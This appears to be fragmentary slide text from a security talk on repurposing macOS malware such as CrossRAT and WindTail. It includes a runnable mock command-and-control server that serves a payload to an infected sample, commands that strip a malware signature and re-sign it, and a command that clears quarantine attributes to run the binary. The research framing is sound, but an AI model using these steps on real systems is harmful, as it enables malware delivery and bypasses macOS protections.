EXC_CRASH (SIGKILL)
Termination Reason: EXEC, [0xc] This UPX compressed binary contains an invalid Mach-O header and cannot be loaded.

ColdRoot (PoC) (crashes on macOS)

her: "I was hacked!"
me: clearly "planted"

CrossRAT (govt malware): "targets include individuals and entities that a nation state might typically attack, including governments, [and] military targets"
    # Mock C&C request handler from the slide, completed so it runs under Python 3
    # (the surrounding handler class, server setup and port are assumed; the slide
    # shows only the two branches and writes bytes to the socket)
    from http.server import BaseHTTPRequestHandler, HTTPServer

    class MockC2Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.send_response(200)
            self.end_headers()
            # request for file name
            if 'runs=tup' in self.path:
                self.wfile.write(b'update.zip')
            # request for file contents
            elif 'update.zip' in self.path:
                with open('update.zip', mode='rb') as file:
                    self.wfile.write(file.read())

    HTTPServer(('', 80), MockC2Handler).serve_forever()

request: file name (we pass back "update.zip")
request: file contents "update.zip"
c&c logic: download & execute "update.bin"
OSX.WindTail/Final_Presentation.app

$ codesign -dvv OSX.WindTail/Final_Presentation.app
Final_Presentation.app: code object is not signed at all

remove (revoked) certificate; undocumented flag: '--remove-signature'

$ codesign -s "Developer ID Application: <some dev id>"
(re)sign
(re)signed, validly
$ xattr -rc evil.com
$ ./evil.bin
[+] running evil.bin

Given arbitrary code execution (i.e. via exploit) ...an attacker can still run arbitrary code, such as repurposed malware

notarization enforcement: only user-downloaded files